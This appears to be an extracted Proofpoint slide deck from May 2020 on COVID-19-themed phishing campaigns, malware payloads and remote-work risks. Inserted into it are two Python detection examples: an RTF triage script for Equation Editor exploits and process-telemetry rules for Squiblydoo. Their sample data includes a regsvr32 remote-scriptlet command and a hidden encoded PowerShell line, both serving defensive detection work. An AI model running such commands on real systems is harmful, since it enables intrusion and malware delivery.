Phishing During a Pandemic: Actors, Campaigns & Threats Leveraging COVID-19 Lures
20 May 2020
© 2019 Proofpoint. All rights reserved
Global Campaigns By Campaign Family
Global COVID-Themed Campaigns By Campaign Family
Global vs COVID Brand Abuse Trends
Charts: All Global Campaign Brand Abuse; All COVID-Themed Global Campaign Brand Abuse
Actors: Silent Librarian; Modest; Veers
Lures: Covid-19 Map; Covid-19 Fake Bill; Covid WHO Lure
Key Changes to Secure Posture for Remote Work
• High risk home network
• Traditional VPN could allow lateral movement
• Going straight to cloud apps from home office
• Traditional visibility limited
• Possibly personal device with uncertain security posture
• Targeted by phishing and BEC (likely leveraging COVID-19 lures)
• Low level of awareness for secure remote working
• No longer on corporate network
• Higher risk for downloaders pulling down secondary payloads
Protecting transitions to remote work
People-Centric Secure Remote Access
• Insider Threat Management for increased visibility into what remote workers do with sensitive data
• ZTNA for rapid, zero trust implementation of secure remote access to on-prem systems and data without any hardware
• Email protection for protection from threats, awareness training for secure remote work practices
• Isolation to provide secure web browsing and BYOD access to SaaS applications
• CASB for visibility, RBA, threat protection, and DLP across cloud apps
Covid-19 Threats
• Relentless focus on credential phish
• Legitimate filesharing abuse
• More complex multi-stage threats
• More BEC variants
• Sophisticated attacks on Office 365 and G Suite accounts
Domains with Most Threats Detected: office[.]com, docs[.]google[.]com, windows[.]net, sharepoint[.]com
Examples shown: CVE-2017-8570 + OLE; Squiblydoo (regsvr32.exe); Lemon Tree (PoSH)
Malicious Third-Party Apps
COVID-19 By the Numbers
COVID-19 Volume
75 Million malicious messages (April 18-22)
330+ Campaigns Tracked
Campaign themes
Actors are motivated and integrating different themes spanning global to personal
[Figure: campaign theme matrix; labels recovered from the diagram]
Primary Motivations: Intrinsic / Mixed / Extrinsic
Secondary Motivations
Delivery: Local / Regional / Global; Tactical / Operational / Strategic; Widespread / Mixed / Focused
Theme examples: Survival kits, Medical Supplies, cases near me; Shipping, manufacturing; Retail, Banking; Tax reduction; Transnational… anti-bacteria credit card; BEC; Markets, World Health Organization; Personal
Regions named: Netherlands; China, Italy, Netherlands, Germany, United States, Japan, Australia
Tactics Leveraging Coronavirus Across the Threats
Malware Payloads
• Emotet
• AZORult Stealer
• AgentTesla Keylogger
• GuLoader / NanoCore RAT
• Microsoft Office Phish
• HawkEye Keylogger
• Betabot
• Ave Maria / GuLoader / Remcos
• Ave Maria / Remcos / LimeRAT
• LimeRAT
• Ostap / The Trick
Threat categories: Malicious Attachment; Malicious URL; Credential Phishing; BEC and Email Fraud
Figure labels: File Names; Domain Names
Threat Focus
Examples from the Landscape
Remcos RAT – COVID-19
Threat Overview
• Summary: Campaign distributing Remcos RAT/downloader with 2 lures (one COVID-19, one harassment)
• Subject: Sexual harassment report / package notification
• Tactics and Tools: .iso image file
• Malware: Remcos RAT
• Volume: Widespread distribution
Family and Medical Leave Act
Threat Overview
• Summary: Campaign spoofing US Department of Labor
• Lure: FMLA adjustments
• Technique: IcedID (modular malware)
• Volume: broadly targeted
Agent Tesla port vessel (1/2)
Threat Overview
• Summary: Message purporting to be from World Health with WHO seal
• Subject: “COVID-19 HIGH RISK VSL / URGENT”
• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor, CVE-2017-11882, CVE-2017-8570, macros) to download Agent Tesla
• Volumes: ~4000 messages; 372 organizations; 44% Transportation; 15% Energy
Agent Tesla port vessel (2/2)
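The Agent Tesla slides describe Office attachments that carry Equation Editor exploits (CVE-2017-11882, CVE-2017-8570) or macros and then download the stealer. The following is an added example, not code from the deck or from Proofpoint: a first-pass triage of RTF attachments in Python that surfaces embedded OLE objects, the class they declare, the class actually recorded inside the OLE1 `\objdata` blob, and the `\objupdate` control word that makes Word refresh the object without user interaction. The two RTF fragments are constructed for this example, and real malicious RTFs are usually obfuscated with extra whitespace and control words, so this is a pre-detonation triage filter rather than a detection signature.

```python
import re

# Constructed sample inputs for this example (not samples from the deck).
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}\\f0 Vessel schedule for next week.\\par}"
# Embeds an OLE object whose declared class is Equation.3 (Equation Editor, the component
# affected by CVE-2017-11882) and asks Word to update it on open. The \objdata blob is an
# OLE1 header: version, format id, class-name length, then "Equation.3\0".
EQNEDT_RTF = (b"{\\rtf1\\ansi\\deff0{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
              b"{\\*\\objdata 01050000020000000b0000004571756174696f6e2e3300}}\\par}")

RTF_MAGIC = b"{\\rtf"
OBJECT_RE = re.compile(r"\\object\b")
OBJCLASS_RE = re.compile(r"\\objclass\s*([A-Za-z0-9_.]+)")
OBJUPDATE_RE = re.compile(r"\\objupdate\b")
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")

# OLE class names used by Equation Editor (EQNEDT32.EXE).
EQUATION_CLASSES = {"Equation.2", "Equation.3"}


def objdata_class_name(hexblob):
    """Parse the class name out of an OLE1 \\objdata blob.

    Layout: 4-byte version, 4-byte format id, 4-byte class-name length, class name.
    Returns None when the blob is too short to carry a name.
    """
    raw = bytes.fromhex("".join(hexblob.split()))
    if len(raw) < 12:
        return None
    name_len = int.from_bytes(raw[8:12], "little")
    name = raw[12:12 + name_len]
    return name.rstrip(b"\0").decode("ascii", "replace") if name else None


def triage_rtf(data):
    """Return a triage record for one attachment.

    'suspicious' is True when the document embeds an Equation Editor object, forces an
    object update on open, or declares a class that differs from the embedded OLE1 data.
    """
    if not data.startswith(RTF_MAGIC):
        return {"is_rtf": False, "objects": 0, "classes": [], "suspicious": False, "reasons": []}
    text = data.decode("latin-1")
    reasons = []
    n_objects = len(OBJECT_RE.findall(text))
    declared = set(OBJCLASS_RE.findall(text))
    embedded = {c for c in (objdata_class_name(h) for h in OBJDATA_RE.findall(text)) if c}
    classes = sorted(declared | embedded)
    for cls in classes:
        if cls in EQUATION_CLASSES:
            reasons.append(f"Equation Editor object ({cls}): CVE-2017-11882 candidate")
    if OBJUPDATE_RE.search(text):
        reasons.append("\\objupdate present: object is refreshed without user interaction")
    if declared and embedded and declared != embedded:
        reasons.append("declared \\objclass does not match the class inside \\objdata")
    return {"is_rtf": True, "objects": n_objects, "classes": classes,
            "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_RTF), ("eqnedt", EQNEDT_RTF)):
        print(label, triage_rtf(blob))
```

Because the class name is read from the OLE1 blob as well as from `\objclass`, a document that declares a harmless class while embedding an Equation Editor object is still flagged; the gateway can then route flagged attachments to sandbox detonation and pass the rest through.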
The Truth of COVID-19 (1/1)
Threat Overview
• Summary: Campaign leveraging Word documents and the Squiblydoo technique to launch a PowerShell script
• Subject: The Truth of COVID-19 [non-Latin characters lost in extraction]
• Tactics and Tools: Word (RTF) documents used Squiblydoo to launch a PowerShell script, followed by downloads of Mimikatz and the remote desktop utility FreeRDP
• Malware: Mimikatz via PowerShell script, then download of the remote desktop utility FreeRDP
• Targeting: 80 PFPT customers across 36 verticals
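The slide above describes a Word (RTF) document launching a PowerShell script through the Squiblydoo technique (regsvr32.exe loading a remote scriptlet), followed by Mimikatz and FreeRDP downloads. As an added example that is not from the deck or from Proofpoint, here is detection logic in Python over process-creation telemetry covering that chain: an Office application spawning a script host, regsvr32.exe pointed at a remote scriptlet, a living-off-the-land binary spawning PowerShell, and a hidden, encoded PowerShell command line. The five JSON events and the field names (`parent_image`, `image`, `command_line`) are constructed for the example; map them onto your own EDR or Sysmon Event ID 1 schema.

```python
import json
import re

# Constructed process-creation events (Sysmon-style fields); not telemetry from the deck.
SAMPLE_EVENTS = [
    r'{"parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", '
    r'"image": "C:\\Windows\\System32\\regsvr32.exe", '
    r'"command_line": "regsvr32.exe /s /n /u /i:http://example.invalid/update.sct scrobj.dll"}',
    r'{"parent_image": "C:\\Windows\\System32\\regsvr32.exe", '
    r'"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '
    r'"command_line": "powershell.exe -nop -w hidden -enc QQBCAEMA"}',  # placeholder payload "ABC"
    r'{"parent_image": "C:\\Windows\\explorer.exe", '
    r'"image": "C:\\Windows\\System32\\regsvr32.exe", '
    r'"command_line": "regsvr32.exe /s C:\\Vendor\\vendor.dll"}',
    r'{"parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", '
    r'"image": "C:\\Windows\\splwow64.exe", "command_line": "splwow64.exe 12288"}',
    r'{"parent_image": "C:\\Windows\\explorer.exe", '
    r'"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '
    r'"command_line": "powershell.exe"}',
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"regsvr32.exe", "powershell.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "certutil.exe"}
# regsvr32 fetching a scriptlet over the network or loading the scriptlet COM host.
SCRIPTLET_RE = re.compile(r"/i:\s*(?:https?|ftp):|scrobj\.dll", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names one process-creation event matches."""
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    if image == "regsvr32.exe" and SCRIPTLET_RE.search(cmd):
        hits.append("regsvr32_remote_scriptlet")
    if parent in SCRIPT_HOSTS and parent != "powershell.exe" and image == "powershell.exe":
        hits.append("lolbin_spawned_powershell")
    if image == "powershell.exe" and ENCODED_RE.search(cmd) and HIDDEN_RE.search(cmd):
        hits.append("hidden_encoded_powershell")
    return hits


def detect(lines):
    """Run every rule over JSON-encoded events; one alert per (event, rule) pair."""
    alerts = []
    for index, line in enumerate(lines):
        event = json.loads(line)
        for rule in evaluate(event):
            alerts.append({"event": index, "rule": rule, "image": basename(event["image"])})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The two benign events (a signed vendor DLL registered from Explorer, and the print-spooler helper Word legitimately launches) produce no alerts, which is the property to preserve when tuning: the parent/child pairing and the command-line shape together carry the signal, not regsvr32.exe or powershell.exe on their own.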
Emerging Trends
• Spoofed offers of relief from financial institutions
• Primarily steals credit card details, direct deposit details, and other forms of financial data
• Most prevalent in the United States; also present in Europe, Australia, and Africa
Proofpoint and COVID-19
Summary, our position, updates, questions
[Figure: Proofpoint people-centric platform diagram; labels recovered from the slide]
PEOPLE-CENTRIC PROTECTION: Protect people from the threats that target them
DATA AND ACCESS CONTROLS: Protect the data people create and access from security and compliance risk
AWARENESS AND TRAINING: Enable users to protect themselves and your organization
Channels covered: Advanced Email Security; Cloud Accounts; Internal Email; Personal Webmail; Endpoint Activity; Web and Unsanctioned App Access; Sanctioned Access; Identity Deception
Products shown: Targeted Attack Protection (TAP); Threat Response Auto-Pull (TRAP); Internal Mail Defense; Cloud Account Defense; Email Isolation; Email DLP; Email Encryption; CASB DLP; Browser Isolation; Zero Trust Access; Email Fraud Defense; Insider Threat Management; Cloud App Governance and Data Protection; Information Protection
Response and Resources
Response
• Detection for commodity remains strong
• TAP Campaigns being tracked as “COVID-19”
• Set of COVID-19 hunting and detection IDS sigs available open source in ET Open
  – http://rules.emergingthreatspro.com/open/
• Free Meta VPN solution through September 2020
Continuing Updates
• Proofpoint blog updates
  – https://www.proofpoint.com/us/blog
@threatinsight
Other Resources (All Free)
• Proofpoint Meta available to all Proofpoint customers at no charge for zero trust network access
• Security Awareness Training attack spotlight: Covid-19 lures
• Remote worker-tailored training modules
• Partner offer: MFA and SSO from Okta: https://www.okta.com/okta-for-emergency-remote-work/